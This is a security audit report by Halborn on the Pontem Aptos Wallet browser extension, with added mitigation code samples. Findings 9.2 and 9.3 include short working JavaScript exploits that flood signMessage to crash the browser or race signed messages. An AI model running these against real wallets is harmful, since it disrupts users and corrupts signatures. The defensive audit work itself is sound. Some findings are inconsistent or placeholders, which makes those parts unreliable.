
Aptos Wallet - Pontem Network


Prepared by:


HALBORN

Last Updated 04/26/2024

Date of Engagement: September 13th, 2022 - October 3rd, 2022

Summary

64% of all reported findings have been addressed

  • All findings: 14
  • Critical: 4
  • High: 0
  • Medium: 3
  • Low: 4
  • Informational: 3


1. INTRODUCTION

Pontem Network engaged Halborn to conduct a security assessment on their web application, beginning on 2022-09-13 and ending on 2022-10-03. The security assessment was scoped to the Pontem Network - Aptos Wallet browser extension. Halborn was provided access to the halborn-review-1 branch of the private GitHub repository of the Aptos Wallet for local deployment, in order to conduct security testing of the application and report the findings at the end of the engagement.

2. AUDIT SUMMARY

The team at Halborn was provided two weeks for the engagement and assigned a full-time security engineer to audit the security of the Aptos Wallet application. The security engineer is a blockchain and smart-contract security expert with advanced penetration testing and smart-contract hacking skills and deep knowledge of multiple blockchain protocols.

The purpose of this audit is to:

    • Improve the security of the application by testing it with both white-box and black-box approaches

    • Identify potential security issues that could be affecting the web application

In summary, Halborn identified some improvements to reduce the likelihood and impact of multiple risks, which have been partially addressed by Pontem Network. In addition, most of the critical issues were solved. The following list contains all the solved issues:

    • Browser Denial of Service related to signMessage function.

    • Race conditions occurring when signing multiple messages.

    • Lack of confirmation when signing messages with the wallet.

    • New accounts were not being registered on creation.

    • Clear-text passwords in source code.

    • Several vulnerable dependencies.

    • Application dependencies were not pinned to exact versions.

    • Redundant if clause in source code.

However, Halborn identified some security risks that were accepted by the Pontem Network team:

    • Weak password policy.

    • Improper mnemonic verification on wallet creation process.

    • Some To-Do comments among the source code.

Finally, Pontem Network pointed out that some issues were going to be addressed in future releases of the application:

    • Access to confidential user data from the clipboard.

    • Unencrypted mnemonic phrase in memory (Demonic).

    • Unencrypted user password in memory.

3. TEST APPROACH & METHODOLOGY

Halborn performed a combination of manual and automated security testing to balance efficiency, timeliness, practicality, and accuracy in regard to the scope of this audit. While manual testing is recommended to uncover flaws in logic, process and implementation, automated testing techniques help enhance coverage of the code and can quickly identify items that do not follow security best practices.

The following phases and associated tools were used throughout the term of the audit:

    • Mapping Application Content and Functionality

    • Technology stack-specific vulnerabilities and Code Audit

    • Known vulnerabilities in 3rd party / OSS dependencies

    • Application Logic Flaws

    • Authentication / Authorization flaws

    • Input Handling

    • Fuzzing of all input parameters

    • Testing for different types of sensitive information leakages: memory, clipboard, ...

    • Test for Injection (SQL/JSON/HTML/JS/Command/Directories...)

    • Brute Force Attempts

    • Perform static analysis on code

    • Ensure that coding best practices are being followed by the Pontem Network team


    • Identify potential vulnerabilities that may pose a risk to Pontem Network

4. SCOPE

Pontem Network - Aptos Wallet:

    • URL: Private GitHub repository of the Aptos Wallet

    • Environment: halborn-review-1 branch.

    • Commit: f2e00bbdc0fd419139ca6c8a4b6d1b5aa2cab1d1

    • Send functionality (from graphical interface): commit 8cdd90ec5fd57cbfaf9b412b89a329f310c10565

5. CAVEATS

The SignAndSubmit functionality was not working during the assessment, making it impossible to confirm its correct behavior. The functionality was tested in commits f2e00bbdc0fd419139ca6c8a4b6d1b5aa2cab1d1 and 8cdd90ec5fd57cbfaf9b412b89a329f310c10565; neither commit allowed the correct operation of the functionality to be confirmed. The Pontem Network team proposed testing the functionality on tag v1.7.0, and Halborn agreed to check it on the proposed tag. However, the SignAndSubmit functionality could not be audited on tag v1.7.0 either, because all transactions attempted with this version remained in Pending status, making verification of the functionality impossible.

6. RISK METHODOLOGY

Vulnerabilities or issues observed by Halborn are ranked based on a risk assessment methodology that measures the LIKELIHOOD of a security incident and the IMPACT should an incident occur. This framework works for communicating the characteristics and impacts of technology vulnerabilities. The quantitative model ensures repeatable and accurate measurement while enabling users to see the underlying vulnerability characteristics that were used to generate the risk scores. For every vulnerability, a risk level will be calculated on a scale of 5 to 1, with 5 being the highest likelihood or impact.

RISK SCALE - LIKELIHOOD

  • 5 - Almost certain an incident will occur.
  • 4 - High probability of an incident occurring.
  • 3 - Potential of a security incident in the long term.
  • 2 - Low probability of an incident occurring.
  • 1 - Very unlikely the issue will cause an incident.

RISK SCALE - IMPACT

  • 5 - May cause devastating and unrecoverable impact or loss.
  • 4 - May cause a significant level of impact or loss.
  • 3 - May cause a partial impact or loss to many.
  • 2 - May cause temporary impact or loss.
  • 1 - May cause minimal or un-noticeable impact.

The risk level is then calculated as the sum of these two values, giving a value of 10 to 1 with 10 being the highest level of security risk.

  • 10 - CRITICAL
  • 9 - 8 - HIGH
  • 7 - 6 - MEDIUM
  • 5 - 4 - LOW
  • 3 - 1 - VERY LOW AND INFORMATIONAL

7. SCOPE

Out-of-Scope: New features/implementations after the remediation commit IDs.

8. Assessment Summary & Findings Overview


Impact x Likelihood chart of findings HAL-01 to HAL-14 (image not reproduced)

Security analysis | Risk level | Remediation date
CONFIDENTIAL DATA ACCESSIBLE ON THE CLIPBOARD | Critical | Future Release
POTENTIAL MEMORY LEAK ON `signMessage` - BROWSER DENIAL OF SERVICE | Critical | Solved - 10/10/2022
RACE CONDITION ON SIGNED MESSAGE | Critical | Solved - 10/10/2022
UN-ENCRYPTED USER PASSWORD IN-MEMORY | Critical | Future Release
CLEAR-TEXT PASSWORDS IN SOURCE CODE | Medium | Solved - 02/09/2023
WEAK PASSWORD POLICY | Medium | Risk Accepted
VULNERABLE DEPENDENCIES | Medium | Solved - 02/21/2023
DEPENDENCIES NOT PINNED TO AN EXACT VERSION | Low | Solved - 02/16/2023
'IF' CLAUSE RETURNING SAME VALUES | Low | Solved - 02/09/2023
LACK OF MNEMONIC PHRASE VERIFICATION | Low | Risk Accepted
PRESENCE OF TO-DO COMMENTS ON THE CODE | Low | Risk Accepted
NO CONFIRMATION REQUIRED ON SIGNING MESSAGES | Informational | -
UNENCRYPTED MNEMONIC PHRASE IN-MEMORY (DEMONIC) | Informational | -
ACCOUNT NOT INITIALIZED ON CREATION | Informational | -

9. Findings & Tech Details

9.1 CONFIDENTIAL DATA ACCESSIBLE ON THE CLIPBOARD

// Critical

Description

The Aptos wallet could allow an attacker to obtain the mnemonic passphrase from the clipboard storage. The attack paths can be considered both local and remote: a Python script or any other local process with clipboard access could obtain this sensitive information, and a malicious web page with clipboard access could obtain the mnemonic passphrase and send it to the attacker.

PoC video: Mnemonic phrase leaked from clipboard using python script

PoC video: Mnemonic phrase leaked from clipboard using web browser

Score
Impact: 5
Likelihood: 5
Recommendation

PENDING: The Pontem Network team stated that the recommendation will be followed in a future version of the code. Pontem Aptos Wallet may be at risk until the fixes have been reviewed and deployed.
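One mitigation for the clipboard exposure described above is to bound how long a copied secret stays readable. The following is an added example written for this page, not code from the Pontem Network wallet or from Halborn: a helper that copies the secret, then overwrites the clipboard after a time-to-live, but only if the clipboard still holds that secret, so unrelated user content is not clobbered. The clipboard and scheduler are injected (in an extension they would be navigator.clipboard and setTimeout); the in-memory stand-ins, the phrase strings and the 30-second TTL are constructed for this example.

```javascript
// Added example (not Pontem Network or Halborn code): keep a copied secret on the
// clipboard only for a bounded time. The clipboard and the scheduler are injected so
// the same logic runs in a browser (navigator.clipboard, setTimeout) and offline here.
function createSecretClipboard({ clipboard, schedule = (fn, ms) => setTimeout(fn, ms), ttlMs = 30000 }) {
  let generation = 0; // bumped on every copy so an old timer never wipes a newer copy

  async function copySecret(secret) {
    const myGeneration = ++generation;
    await clipboard.writeText(secret);
    schedule(async () => {
      // A newer copySecret call owns the clipboard now; its own timer handles the wipe.
      if (myGeneration !== generation) return;
      // Only clear if the secret is still there, so unrelated user content is not clobbered.
      // (Reading the clipboard from an extension needs the clipboardRead permission.)
      const current = await clipboard.readText();
      if (current === secret) await clipboard.writeText('');
    }, ttlMs);
    return myGeneration;
  }

  return { copySecret };
}

// Constructed in-memory stand-ins for navigator.clipboard and setTimeout, used for offline runs.
function makeFakeClipboard() {
  let buffer = '';
  return {
    async writeText(text) { buffer = text; },
    async readText() { return buffer; },
    current() { return buffer; },
  };
}

function makeManualScheduler() {
  const timers = [];
  return {
    schedule: (fn, ms) => { timers.push({ fn, ms }); },
    fire: async () => { const t = timers.shift(); if (t) await t.fn(); },
  };
}

// Offline walk-through: copy a constructed phrase, confirm it is readable, fire the timer,
// confirm it is gone; then show that a newer copy survives an older copy's timer.
async function demo() {
  const clipboard = makeFakeClipboard();
  const scheduler = makeManualScheduler();
  const helper = createSecretClipboard({ clipboard, schedule: scheduler.schedule, ttlMs: 30000 });

  await helper.copySecret('constructed phrase one');
  const afterCopy = clipboard.current();
  await scheduler.fire();
  const afterWipe = clipboard.current();

  await helper.copySecret('constructed phrase two');
  await helper.copySecret('constructed phrase three');
  await scheduler.fire(); // timer of "two": superseded, must not wipe "three"
  const afterStaleTimer = clipboard.current();
  await scheduler.fire(); // timer of "three": wipes the clipboard
  const afterSecondWipe = clipboard.current();

  return { afterCopy, afterWipe, afterStaleTimer, afterSecondWipe };
}

demo().then(r => console.log(JSON.stringify(r)));
```

A time-limited clipboard narrows the window but does not close it: any process or page that reads the clipboard inside the TTL still gets the phrase, so the safer default remains not offering a copy button for the mnemonic at all and displaying it for manual transcription only.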

9.2 POTENTIAL MEMORY LEAK ON `signMessage` - BROWSER DENIAL OF SERVICE

// Critical

Description

Pontem Aptos Wallet allowed an attacker to execute malicious code using the exported wallet functions, triggering a Denial of Service on the extension and on the browser (Chrome v105.0.5195.125). An attacker could use the malicious code to call the wallet, whether locked or unlocked, to trigger a Denial of Service on the browser, closing the running process.

Exploit

async function sign() {
  window.pontem.signMessage('Signed message')
    .then(result => {
      console.log('Signed Message', result)
    })
    .catch(e => console.log('Error', e))
}

async function exploitDoS() {
  for (let i = 0; i < 1000000; i++) {
    sign()
  }
}

Extension Denial-of-Service

Browser Denial-of-Service

Score
Impact: 5
Likelihood: 5
Recommendation

SOLVED: The issue was solved in the following GitHub Pull Request (Commit 45429fb617843ccfbbab62dec76c77a4001ea73d): Feature apt 643 #113

9.3 RACE CONDITION ON SIGNED MESSAGE

// Critical

Description

The exported signMessage function allowed an attacker to abuse it and trigger a race condition. The function did not control its own execution, allowing multiple calls to the same function in a short period of time. This situation allowed an attacker to overwrite the content of the signed messages.

Exploit

async function exploitSign() {
  for (let i = 1; i <= 5; i++) {
    window.pontem.signMessage(i)
      .then(result => {
        console.log('Signed Message', result)
      })
      .catch(e => console.log('Error', e))
  }

  window.pontem.signMessage('Test1')
    .then(result => {
      console.log('Signed Message', result)
    })
    .catch(e => console.log('Error', e))

  await new Promise(r => setTimeout(r, 1000));

  window.pontem.signMessage('Test2')
    .then(result => {
      console.log('Signed Message', result)
    })
    .catch(e => console.log('Error', e))
}

Race condition on the signed messages

Score
Impact: 5
Likelihood: 5
Recommendation

SOLVED: The issue was solved in the following GitHub Pull Request (Commit 45429fb617843ccfbbab62dec76c77a4001ea73d): Feature apt 643 #113
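Both 9.2 (unbounded concurrent signMessage calls exhausting the extension) and 9.3 (concurrent calls overwriting each other's result) have the same root cause: the exported function neither serialized nor limited in-flight requests. The following is an added example written for this page, not the wallet's own fix or the code in the referenced pull request: a queue placed in front of a signing handler that runs requests one at a time in arrival order, rejects new requests once `maxPending` are waiting, and refuses requests while the wallet is locked. The fake signer, the `isUnlocked` predicate, the limit of 5 and the message values are constructed assumptions.

```javascript
// Added example (not the wallet's own code): a bounded, serialized front for a signing
// handler. Requests run one at a time in arrival order, so a later call cannot overwrite
// an earlier response (the race in 9.3), and callers above `maxPending` are rejected
// immediately instead of piling up promises in the extension (the exhaustion in 9.2).
function createSigningQueue(signFn, { maxPending = 5, isUnlocked = () => true } = {}) {
  let tail = Promise.resolve(); // settles when the most recently queued request is done
  let pending = 0;
  const stats = { rejectedBusy: 0, rejectedLocked: 0 };

  function signMessage(message) {
    if (!isUnlocked()) {
      stats.rejectedLocked++;
      return Promise.reject(new Error('wallet is locked'));
    }
    if (pending >= maxPending) {
      stats.rejectedBusy++;
      return Promise.reject(new Error('too many pending signing requests'));
    }
    pending++;
    // Run only after every earlier request settled, whether it succeeded or failed.
    const result = tail.then(() => signFn(message));
    tail = result.then(() => { pending--; }, () => { pending--; });
    return result;
  }

  return { signMessage, stats: () => ({ pending, ...stats }) };
}

// Constructed stand-in for the real signer: records order and peak concurrency, and
// yields to the event loop once to mimic the user-confirmation round trip.
function makeFakeSigner() {
  let inFlight = 0;
  const record = { maxInFlight: 0, signed: [] };
  async function sign(message) {
    inFlight++;
    record.maxInFlight = Math.max(record.maxInFlight, inFlight);
    await new Promise(resolve => setTimeout(resolve, 1));
    inFlight--;
    record.signed.push(String(message));
    return { message: String(message), signature: 'constructed-sig:' + String(message) };
  }
  return { sign, record };
}

// Offline walk-through: a burst of five calls against a queue that allows three.
async function demo() {
  const signer = makeFakeSigner();
  const queue = createSigningQueue(signer.sign, { maxPending: 3 });
  const outcomes = await Promise.all(
    [1, 2, 3, 4, 5].map(m => queue.signMessage(m).then(r => r.signature, e => 'rejected: ' + e.message))
  );
  return {
    outcomes,
    maxInFlight: signer.record.maxInFlight,
    signedOrder: signer.record.signed,
    stats: queue.stats(),
  };
}

demo().then(r => console.log(JSON.stringify(r, null, 2)));
```

With this in place the loop from the 9.2 exploit produces `maxPending` queued requests and a stream of immediate rejections rather than a million pending promises, and the 9.3 burst yields one result per message in the order requested. The limit should be small: a user can only confirm one signing prompt at a time, so anything beyond a handful of waiting requests is noise from a page, not legitimate use.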

9.4 UN-ENCRYPTED USER PASSWORD IN-MEMORY

// Critical

Description

The mnemonic phrase in the wallet is not encrypted in memory. As a result, an attacker who has compromised a user's machine can exfiltrate and steal the user's wallet password.

This report only contains the vulnerabilities found within the Windows platform. The number of ways to exploit this on Windows was greater than on Linux and macOS. If the memory issues are fixed on the Windows platform, the fixes will automatically also cover Linux and macOS.

The plain text user password is available in memory during various scenarios. Memory dumps were taken throughout the testing process. These memory dumps contained an exact replica of what was in memory while the application was open.

Making use of the strings tool on Linux, a search through the memory dump file revealed the plain text mnemonic phrase.

User wallet password leaked from Chrome memory dump
Score
Impact: 5
Likelihood: 5
Recommendation

PENDING: The Pontem Network team stated that the recommendation will be followed in a future version of the code. Pontem Aptos Wallet may be at risk until the fixes have been reviewed and deployed.

Several improvements in the password's encryption were made in the following GitHub Pull Request: [Wallet] APT-757. Encrypt plain text password #297

9.5 CLEAR-TEXT PASSWORDS IN SOURCE CODE

// Medium

Description

Hard-coded clear-text credentials were found in the source code. This is considered bad practice and may pose a risk for the application if a malicious user manages to access some of them. Secrets should be securely stored and shared within the development team on a need-to-know basis. Additionally, these credentials might later be re-used by someone, and should they fall into the wrong hands, they could be used to access sensitive services and data.

Code Location

.env.development

HTTPS=true
BROWSER=none
REACT_APP_DEVELOPMENT_VAULT_PASSWORD=123456

Score
Impact: 4
Likelihood: 2
Recommendation

SOLVED: The issue was solved in the following GitHub Commit: 6b1b114f104079ecec717fcca00ad8b485e28666. The Pontem Network team removed the clear-text password from the source code.

9.6 WEAK PASSWORD POLICY

// Medium

Description

There was no password policy enforced when the user set up the password. Weak passwords are considered to be those that are short, employ common words, system/software defaults, or any terms that could be quickly guessed by executing a brute force attack using a subset of all possible passwords, such as dictionary words, proper nouns, username-based words, common variations on these themes, and even company-related terms.

It was possible to set the following values as the user's password:

  • 0123456789
  • 000000
  • aaaaaa
  • abcdef

These values are considered too weak to be used as passwords.

Weak password set up during the wallet creation

Due to the lack of a robust password policy (see the following vulnerabilities), it may be easy for an attacker to brute-force user accounts and compromise them.

Score
Impact: 3
Likelihood: 4
Recommendation

RISK ACCEPTED: The Pontem Network team accepted the risk of the issue.
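The following is an added example written for this page, not the wallet's own code, showing the kind of policy check that would have rejected the four values listed in the finding. The 8-character minimum, the three-character-class requirement and the short denylist are assumptions chosen for the example; the report does not prescribe specific thresholds. The check returns the list of violated rules rather than a bare boolean so the UI can tell the user what to change.

```javascript
// Added example (not the wallet's own code): a password policy check that rejects the
// values the finding lists. The 8-character minimum, the three-class requirement and the
// small denylist are assumptions for this example, not values taken from the report.
const MIN_LENGTH = 8;
const MIN_CHARACTER_CLASSES = 3;
const COMMON_PASSWORDS = new Set(['password', 'qwerty', 'letmein', 'welcome', 'pontem']); // constructed sample

// True when every adjacent character pair steps by exactly +1 (abcdef, 0123) or -1 (fedcba).
function isSequentialRun(text) {
  if (text.length < 4) return false;
  const codes = Array.from(text, ch => ch.codePointAt(0));
  const ascending = codes.every((c, i) => i === 0 || c - codes[i - 1] === 1);
  const descending = codes.every((c, i) => i === 0 || codes[i - 1] - c === 1);
  return ascending || descending;
}

function countCharacterClasses(text) {
  return [/[a-z]/, /[A-Z]/, /[0-9]/, /[^A-Za-z0-9]/].filter(re => re.test(text)).length;
}

// Returns { ok, problems } so the UI can report exactly which rules failed.
function checkPasswordPolicy(password) {
  const problems = [];
  const lowered = password.toLowerCase();
  if (password.length < MIN_LENGTH) problems.push('too-short');
  if (new Set(password).size === 1) problems.push('single-repeated-character');
  if (isSequentialRun(lowered)) problems.push('sequential-characters');
  if (COMMON_PASSWORDS.has(lowered)) problems.push('common-password');
  if (countCharacterClasses(password) < MIN_CHARACTER_CLASSES) problems.push('insufficient-character-variety');
  return { ok: problems.length === 0, problems };
}

// Wallet-creation gate: the two entered passwords must match before the policy is applied.
function validateNewWalletPassword(password, confirmation) {
  if (password !== confirmation) return { ok: false, problems: ['passwords-do-not-match'] };
  return checkPasswordPolicy(password);
}

// Offline walk-through over the four values from the finding plus one acceptable value.
for (const candidate of ['0123456789', '000000', 'aaaaaa', 'abcdef', 'Tr0ub4dor&3xample']) {
  console.log(candidate, JSON.stringify(checkPasswordPolicy(candidate)));
}
```

A denylist of a few words is only a placeholder; in production the check against known-breached or common passwords should use a large list, and the length minimum matters more than character-class rules for resisting offline guessing of the vault password.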

9.7 VULNERABLE DEPENDENCIES

// Medium

Description

Aptos Wallet uses multiple third-party dependencies. However, some of them were affected by publicly known vulnerabilities that may pose a risk to the overall security level of the application.

Although the tests were mainly carried out from a black-box perspective, multiple vulnerable dependencies were found during the code review phase, and Halborn considered them worth reporting.

The vulnerable dependencies and their corresponding vulnerabilities are listed below in more detail.

Vulnerable dependencies
Score
Impact: 3
Likelihood: 3
Recommendation

SOLVED: The issue was solved in the following GitHub Pull Request (Commit 08c13318d84766df8ef24e913802959b27401689): Fixed vulnerabilities deps #315

9.8 DEPENDENCIES NOT PINNED TO AN EXACT VERSION

// Low

Description

Aptos Wallet contains over 50 dependencies, some of which were not pinned to an exact version but to a compatible-version range (^x.x.x). This could potentially enable dependency attacks, as observed with the event-stream package used by the Copay Bitcoin wallet.

Code Location

package.json

"dependencies": {
    "@fortawesome/fontawesome-svg-core": "^6.1.1",
    "@fortawesome/free-solid-svg-icons": "^6.1.1",
    "@fortawesome/react-fontawesome": "^0.2.0",
    "@metamask/browser-passworder": "^3.0.0",
    "@metamask/jazzicon": "^2.0.0",
    "@metamask/post-message-stream": "^6.0.0",
    "@mui/icons-material": "^5.8.4",
    "@mui/material": "^5.8.6",
    "@testing-library/jest-dom": "^5.16.4",
    "@testing-library/react": "^13.3.0",
    "@testing-library/user-event": "^13.5.0",
    "aptos": "^1.3.11",
    "axios": "^0.27.2",
    "bignumber.js": "^9.0.2",
    "bip39": "^3.0.4",
    "cipher-base": "^1.0.4",
    "classnames": "^2.3.1",
    "coinstring": "^2.3.0",
Score
Impact: 2
Likelihood: 2
Recommendation

SOLVED: The issue was solved in the following GitHub Commit: 2297b72090b9672614a0402751099f1d000c81ee
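As an added example for this page, not tooling from the project, here is a check that scans a package.json and reports every dependency specifier that is not an exact version. Anything other than a plain `x.y.z` (ranges such as `^` and `~`, `*`, `latest`, git or URL specifiers) is flagged, since each of those allows a newer and possibly malicious release to be installed with no change to the manifest. The sample manifest is constructed; four of its specifiers are modelled on the ones quoted above, and the package names `some-tool` and `prerelease-lib` are placeholders.

```javascript
// Added example (not the project's tooling): flag dependency specifiers in package.json
// that are not an exact version. Only "x.y.z" (optionally with a pre-release or build
// suffix) passes; ranges, "*", "latest", git and URL specifiers are reported.
const EXACT_VERSION = /^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$/;

function findUnpinnedDependencies(packageJsonText, fields = ['dependencies', 'devDependencies']) {
  const manifest = JSON.parse(packageJsonText);
  const unpinned = [];
  for (const field of fields) {
    for (const [name, spec] of Object.entries(manifest[field] || {})) {
      if (typeof spec !== 'string' || !EXACT_VERSION.test(spec.trim())) {
        unpinned.push({ field, name, spec });
      }
    }
  }
  return unpinned;
}

// Constructed manifest: specifiers modelled on those quoted in the finding, plus pinned
// entries (and one pinned pre-release) to show what passes and what is flagged.
// "some-tool" and "prerelease-lib" are placeholder package names.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'sample-wallet',
  dependencies: {
    'aptos': '^1.3.11',
    'bip39': '^3.0.4',
    'axios': '0.27.2',
    'classnames': '~2.3.1',
    'some-tool': '*',
    'prerelease-lib': '2.0.0-beta.1',
  },
  devDependencies: {
    'eslint': 'latest',
    'typescript': '4.8.3',
  },
});

// Human-readable report lines, one per offending specifier.
function report(packageJsonText) {
  return findUnpinnedDependencies(packageJsonText)
    .map(u => `${u.field}/${u.name}: "${u.spec}" is not an exact version`);
}

console.log(report(SAMPLE_PACKAGE_JSON).join('\n'));
```

To run it against a real project, read package.json with `fs.readFileSync` and pass the text to `report`. Pinning the manifest addresses only direct dependencies; transitive ones are fixed by committing the lockfile and installing with `npm ci` (or the Yarn equivalent), which refuses to install anything the lockfile does not list.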

9.9 'IF' CLAUSE RETURNING SAME VALUES

// Low

Description

The transaction.ts file contains a function called setTokenName. It contained a conditional whose branches returned the same value whether the condition evaluated to true or false. This behavior was not dangerous by itself; however, the function could be used by other functionality, and the redundant branch could lead to uncontrolled behavior.

Code Location

src/models/transaction.ts

const setTokenName = (tx: UserTransaction, type: string): string => {
  if (('type_arguments' in tx.payload) && tx.payload.type_arguments.length) {
    const index = type === 'remove_liquidity' ? 1 : 0;
    return prettifyTokenName(tx.payload.type_arguments[index].split('::').at(-1) as string);
  } else if (aptosTxTypes.includes(type)) {
    return 'Aptos';
  } else {
    return 'Aptos';
  }
}
Score
Impact: 2
Likelihood: 2
Recommendation

SOLVED: The issue was solved in the following GitHub Commit: 24a7aacea898459803e22479acd033890e2a8828

9.10 LACK OF MNEMONIC PHRASE VERIFICATION

// Low

Description

The Aptos Wallet did not have any mechanism to verify the provided mnemonic phrase during the wallet creation process after it had been copied by the user. The lack of this mechanism may pose a significant risk and end in a loss of funds if the user saves the passphrase incorrectly or forgets to write it down securely.

PoC video: Lack of mnemonic phrase security check

Score
Impact: 2
Likelihood: 2
Recommendation

RISK ACCEPTED: The Pontem Network team accepted this risk. Currently, the only implemented checks were a warning message showing “Please confirm mnemonic” and a button saying “Resolve”. The user was presented with this warning after the wallet creation. If the user had not copied the phrase during the process, the wallet would have been created and the user would not have access to it. This verification must be implemented before creating the wallet, right after verifying that the two input passwords are the same. The Pontem Network team stated that this will also be implemented in a future release.
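The following is an added example written for this page, not the wallet's own code, of the pre-creation check the recommendation describes: after the user has recorded the phrase, the UI asks for the words at a few randomly chosen positions and only proceeds when the answers match, with a full re-entry variant for UIs that prefer it. Word comparison normalises case, surrounding whitespace and Unicode composition so a correct backup is not rejected over formatting. The 12-word sample phrase is constructed from English BIP39 words (its checksum is not guaranteed valid), and the scripted random source stands in for a `crypto.getRandomValues`-based one.

```javascript
// Added example (not the wallet's own code): the pre-creation check the recommendation
// asks for. After the user has copied the phrase, the UI asks for the words at a few
// random positions; the wallet is only created when those answers match. Normalisation
// tolerates case, surrounding whitespace and Unicode composition differences.
function normalizeWord(word) {
  return word.normalize('NFKD').trim().toLowerCase();
}

function splitMnemonic(mnemonic) {
  return mnemonic.trim().split(/\s+/).map(normalizeWord);
}

// Picks `count` distinct 0-based positions. `randomInt(n)` must return an integer in
// [0, n); in an extension pass one built on crypto.getRandomValues, not Math.random.
function chooseChallengePositions(wordCount, count, randomInt) {
  if (count > wordCount) throw new RangeError('more challenge words than mnemonic words');
  const chosen = new Set();
  while (chosen.size < count) chosen.add(randomInt(wordCount));
  return [...chosen].sort((a, b) => a - b);
}

// True only when every answer matches the word at its challenged position. The whole
// answer list is compared, so a short or padded list cannot pass.
function verifyMnemonicChallenge(mnemonic, positions, answers) {
  const words = splitMnemonic(mnemonic);
  if (answers.length !== positions.length) return false;
  return positions.every((pos, i) =>
    pos < words.length && words[pos] === normalizeWord(String(answers[i] ?? '')));
}

// Alternative full re-entry check, for UIs that ask for the whole phrase again.
function verifyFullReentry(mnemonic, reentered) {
  const original = splitMnemonic(mnemonic);
  const typed = splitMnemonic(reentered);
  return original.length === typed.length && original.every((w, i) => w === typed[i]);
}

// Constructed 12-word sample (English BIP39 words; not necessarily a valid checksum).
const SAMPLE_MNEMONIC = 'abandon ability able about above absent absorb abstract absurd abuse access accident';

// Deterministic stand-in for the random source, for offline runs: cycles a fixed list.
function makeScriptedRandom(values) {
  let i = 0;
  return () => values[i++ % values.length];
}

// Offline walk-through: pick three positions, then answer correctly and incorrectly.
const positions = chooseChallengePositions(12, 3, makeScriptedRandom([3, 3, 7, 1]));
const words = splitMnemonic(SAMPLE_MNEMONIC);
console.log('challenge positions (1-based):', positions.map(p => p + 1));
console.log('correct answers accepted:', verifyMnemonicChallenge(SAMPLE_MNEMONIC, positions, positions.map(p => words[p].toUpperCase())));
console.log('wrong answers rejected:', !verifyMnemonicChallenge(SAMPLE_MNEMONIC, positions, ['abandon', 'abandon', 'abandon']));
```

The check belongs between the password confirmation step and key derivation, as the recommendation states, so that a wallet whose backup was never recorded is never created. Choosing positions with a cryptographic random source matters less for security than for avoiding a predictable challenge the user can answer from a partial note.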

9.11 PRESENCE OF TO-DO COMMENTS ON THE CODE

// Low

Description

Multiple TO-DO comments were found in the code. From a security perspective, the use of these comments does not in itself imply a security risk. However, it could mean that the developed application did not reach an appropriate level of maturity to be deployed in a production environment.

Code Location

src/extension/modals/TxModal/index.tsx

const handleCopy = () => {
  navigator.clipboard.writeText(tx.id)
    .then(() => setSnackVisibility(true))
    .catch(err => {
      // TODO: add error handlers
    });
}
  • src/auth/hooks/useAuth.ts
  • src/data/query.ts
  • src/extension/modals/SuccessTransferModal/index.tsx
  • src/extension/modals/TxModal/index.tsx
  • src/extension/modules/Dashboard/index.tsx
  • src/extension/modules/ImportToken/ImportTokenForm/index.tsx
Score
Impact: 2
Likelihood: 2
Recommendation

RISK ACCEPTED: The Pontem Network team accepted the risk of this issue.

9.12 NO CONFIRMATION REQUIRED ON SIGNING MESSAGES

// Informational

Description
Finding description placeholder
Score
Impact:
Likelihood:

9.13 UNENCRYPTED MNEMONIC PHRASE IN-MEMORY (DEMONIC)

// Informational

Description
Finding description placeholder
Score
Impact:
Likelihood:

9.14 ACCOUNT NOT INITIALIZED ON CREATION

// Informational

Description
Finding description placeholder
Score
Impact:
Likelihood:

Halborn strongly recommends conducting a follow-up assessment of the project either within six months or immediately following any material changes to the codebase, whichever comes first. This approach is crucial for maintaining the project’s integrity and addressing potential vulnerabilities introduced by code modifications.